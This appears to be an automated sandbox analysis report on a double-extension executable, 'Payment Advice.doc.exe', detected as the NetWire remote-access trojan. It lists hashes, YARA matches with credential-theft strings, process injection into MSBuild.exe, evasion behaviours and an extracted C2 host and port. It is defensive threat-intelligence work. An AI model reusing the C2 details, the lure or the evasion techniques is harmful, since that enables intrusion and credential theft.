Windows Analysis Report
Payment Advice.doc.exe

Overview

General Information

Sample Name: Payment Advice.doc.exe
Analysis ID: 624065
MD5: 173ecae1209e548d0df71d631494b30d
SHA1: 34fbce321e992e5bf88bd1a3c0502dc5679e71a7
SHA256: 8a54db382066229c50cc8e6feab1bc532431ee7804e54efceeffd696422e64d4
Tags: exe

Detection

NetWire
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected NetWire RAT
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Binary contains a suspicious time stamp
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Payment Advice.doc.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\Payment Advice.doc.exe" MD5: 173ECAE1209E548D0DF71D631494B30D)
    • cmd.exe (PID: 7120 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 916 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • MSBuild.exe (PID: 7156 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 6940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 3280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
  • word.exe (PID: 4816 cmdline: "C:\Users\user\AppData\Local\word.exe" MD5: 173ECAE1209E548D0DF71D631494B30D)
    • cmd.exe (PID: 1220 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6012 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • word.exe (PID: 6104 cmdline: "C:\Users\user\AppData\Local\word.exe" MD5: 173ECAE1209E548D0DF71D631494B30D)
    • cmd.exe (PID: 6464 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6320 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup
{"C2 list": ["chongmei33.myddns.rocks:49703"], "Password": "Password", "Host ID": "HostId-APRIL", "Mutex": "-", "Install Path": "-", "Startup Name": "-", "ActiveX Key": "-", "KeyLog Directory": "%AppData%\\Logs\\"}
Source | Rule | Description | Author | Strings
Payment Advice.doc.exe | Typical_Malware_String_Transforms | Detects typical strings in a reversed or otherwise modified form | Florian Roth
  • 0x6e86b:$i2: sserddAcorPteG
  • 0x6e87a:$i3: AyrarbiLdaoL
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\word.exe | Typical_Malware_String_Transforms | Detects typical strings in a reversed or otherwise modified form | Florian Roth
  • 0x6e86b:$i2: sserddAcorPteG
  • 0x6e87a:$i3: AyrarbiLdaoL
Source | Rule | Description | Author | Strings
0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security
    0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_NetWire | Detects NetWire RAT | ditekSHen
    • 0x2304d:$x1: SOFTWARE\NetWire
    • 0x23034:$x2: 4E 65 74 57 69 72 65 00 53 4F 46 54 57 41 52 45 5C 00
    • 0x230e0:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    • 0x22f1e:$s2: filenames.txt
    • 0x230c4:$s3: GET %s HTTP/1.1
    • 0x231e5:$s4: [%.2d/%.2d/%d %.2d:%.2d:%.2d]
    • 0x23072:$s6: -m "%s"
    • 0x23046:$g1: HostId
    • 0x239b0:$g2: History
    • 0x23a10:$g3: encrypted_key
    • 0x23065:$g4: Install Date
    • 0x235fd:$g5: hostname
    • 0x23606:$g6: encryptedUsername
    • 0x23618:$g7: encryptedPassword
    0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security
      0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_NetWire | Detects NetWire RAT | ditekSHen
      • 0x2304d:$x1: SOFTWARE\NetWire
      • 0x23034:$x2: 4E 65 74 57 69 72 65 00 53 4F 46 54 57 41 52 45 5C 00
      • 0x230e0:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      • 0x22f1e:$s2: filenames.txt
      • 0x230c4:$s3: GET %s HTTP/1.1
      • 0x231e5:$s4: [%.2d/%.2d/%d %.2d:%.2d:%.2d]
      • 0x23072:$s6: -m "%s"
      • 0x23046:$g1: HostId
      • 0x239b0:$g2: History
      • 0x23a10:$g3: encrypted_key
      • 0x23065:$g4: Install Date
      • 0x235fd:$g5: hostname
      • 0x23606:$g6: encryptedUsername
      • 0x23618:$g7: encryptedPassword
      0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security
        Source | Rule | Description | Author | Strings
        28.0.MSBuild.exe.400000.3.raw.unpack | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security
          28.0.MSBuild.exe.400000.3.raw.unpack | MALWARE_Win_NetWire | Detects NetWire RAT | ditekSHen
          • 0x2304d:$x1: SOFTWARE\NetWire
          • 0x23034:$x2: 4E 65 74 57 69 72 65 00 53 4F 46 54 57 41 52 45 5C 00
          • 0x230e0:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          • 0x22f1e:$s2: filenames.txt
          • 0x230c4:$s3: GET %s HTTP/1.1
          • 0x231e5:$s4: [%.2d/%.2d/%d %.2d:%.2d:%.2d]
          • 0x23072:$s6: -m "%s"
          • 0x23046:$g1: HostId
          • 0x239b0:$g2: History
          • 0x23a10:$g3: encrypted_key
          • 0x23065:$g4: Install Date
          • 0x235fd:$g5: hostname
          • 0x23606:$g6: encryptedUsername
          • 0x23618:$g7: encryptedPassword
          28.0.MSBuild.exe.400000.7.raw.unpack | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security
            28.0.MSBuild.exe.400000.7.raw.unpack | MALWARE_Win_NetWire | Detects NetWire RAT | ditekSHen
            • 0x2304d:$x1: SOFTWARE\NetWire
            • 0x23034:$x2: 4E 65 74 57 69 72 65 00 53 4F 46 54 57 41 52 45 5C 00
            • 0x230e0:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            • 0x22f1e:$s2: filenames.txt
            • 0x230c4:$s3: GET %s HTTP/1.1
            • 0x231e5:$s4: [%.2d/%.2d/%d %.2d:%.2d:%.2d]
            • 0x23072:$s6: -m "%s"
            • 0x23046:$g1: HostId
            • 0x239b0:$g2: History
            • 0x23a10:$g3: encrypted_key
            • 0x23065:$g4: Install Date
            • 0x235fd:$g5: hostname
            • 0x23606:$g6: encryptedUsername
            • 0x23618:$g7: encryptedPassword
            28.0.MSBuild.exe.400000.2.unpack | JoeSecurity_NetWire_1 | Yara detected NetWire RAT | Joe Security
              No Sigma rule has matched
              No Snort rule has matched

              AV Detection

              Source: 28.0.MSBuild.exe.400000.3.unpack, Malware Configuration Extractor: NetWire {"C2 list": ["chongmei33.myddns.rocks:49703"], "Password": "Password", "Host ID": "HostId-APRIL", "Mutex": "-", "Install Path": "-", "Startup Name": "-", "ActiveX Key": "-", "KeyLog Directory": "%AppData%\\Logs\\"}
              Source: Payment Advice.doc.exe, ReversingLabs: Detection: 41%
              Source: Payment Advice.doc.exe, Avira: detected
              Source: chongmei33.myddns.rocks:49703, Avira URL Cloud: Label: malware
              Source: chongmei33.myddns.rocks, Virustotal: Detection: 7%
              Source: C:\Users\user\AppData\Local\word.exe, Avira: detection malicious, Label: HEUR/AGEN.1232117
              Source: C:\Users\user\AppData\Local\word.exe, ReversingLabs: Detection: 41%
              Source: Payment Advice.doc.exe, Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\word.exe, Joe Sandbox ML: detected
              Source: 28.0.MSBuild.exe.400000.3.unpack, Avira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.7.unpack, Avira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.4.unpack, Avira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.6.unpack, Avira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.5.unpack, Avira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Spy.Gen
              Source: 28.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.1.unpack, Avira: Label: TR/Spy.Gen
              Source: 28.0.MSBuild.exe.400000.2.unpack, Avira: Label: TR/Spy.Gen
              Source: Payment Advice.doc.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
              Source: Payment Advice.doc.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Networking

              Source: Malware configuration extractor, URLs: chongmei33.myddns.rocks:49703
              Source: Joe Sandbox View, ASN Name: M247GB M247GB
              Source: unknown, Network traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknown, Network traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49693
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49692
              Source: unknown, Network traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49691
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknown, Network traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknown, Network traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknown, TCP traffic detected without corresponding DNS query: 40.126.31.143
              Source: unknown, TCP traffic detected without corresponding DNS query: 40.126.31.4
              Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
              Source: unknown, TCP traffic detected without corresponding DNS query: 173.222.108.210
              Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: MSBuild.exe, String found in binary or memory: http://www.yandex.com
              Source: MSBuild.exe, 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: http://www.yandex.comsocks=
              Source: word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
              Source: unknown, DNS traffic detected: queries for: chongmei33.myddns.rocks
              Source: word.exe, 00000013.00000002.521532861.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: MSBuild.exe, 0000001C.00000002.517001932.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Binary or memory string: GetRawInputData

              System Summary

              Source: 28.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 28.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 19.2.word.exe.8000000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT, Author: ditekSHen
              Source: 20.2.word.exe.4650c70.1.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT, Author: ditekSHen
              Source: 19.2.word.exe.8000000.2.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT, Author: ditekSHen
              Source: 20.2.word.exe.8130000.2.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT, Author: ditekSHen
              Source: 20.2.word.exe.8130000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT, Author: ditekSHen
              Source: 19.2.word.exe.4540c70.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT, Author: ditekSHen
              Source: 20.2.word.exe.4650c70.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT, Author: ditekSHen
              Source: 19.2.word.exe.4540c70.1.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT, Author: ditekSHen
              Source: 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 00000014.00000002.527972501.0000000008130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects zgRAT, Author: ditekSHen
              Source: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 0000001C.00000000.463163669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 0000001C.00000000.450308266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects NetWire RAT, Author: ditekSHen
              Source: 00000013.00000002.528312106.0000000008000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects zgRAT, Author: ditekSHen
              Source: initial sample, Static PE information: Filename: Payment Advice.doc.exe
              Source: Payment Advice.doc.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
              Source: Payment Advice.doc.exe, type: SAMPLE, Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 28.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 28.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 19.0.word.exe.310000.0.unpack, type: UNPACKEDPE, Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 28.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 20.0.word.exe.390000.0.unpack, type: UNPACKEDPE, Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 20.2.word.exe.390000.0.unpack, type: UNPACKEDPE, Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 19.2.word.exe.8000000.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 20.2.word.exe.4650c70.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 19.2.word.exe.8000000.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 20.2.word.exe.8130000.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 20.2.word.exe.8130000.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 19.2.word.exe.4540c70.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 20.2.word.exe.4650c70.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 19.2.word.exe.4540c70.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 19.2.word.exe.310000.0.unpack, type: UNPACKEDPE, Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 0.0.Payment Advice.doc.exe.f30000.0.unpack, type: UNPACKEDPE, Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 0.2.Payment Advice.doc.exe.f30000.0.unpack, type: UNPACKEDPE, Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 00000014.00000002.527972501.0000000008130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 0000001C.00000000.463163669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 0000001C.00000000.450308266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 00000013.00000002.528312106.0000000008000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: C:\Users\user\AppData\Local\word.exe, type: DROPPED, Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 19_2_00F47CA0
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 19_2_00F47C2F
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C66581
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C62C20
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C62841
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C62850
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_00C62C1F
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_028B7CA0
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_028B7C2F
              Source: C:\Users\user\AppData\Local\word.exe, Code function: 20_2_028B7C7F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00403047
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_0041D049
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00419463
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00415079
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00420420
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_004208C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_004034D3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00414976
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00402E68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00416619
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_0040AEC6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00402AFC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00415ABF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_00420F40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_0041FF50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 28_2_0040A728
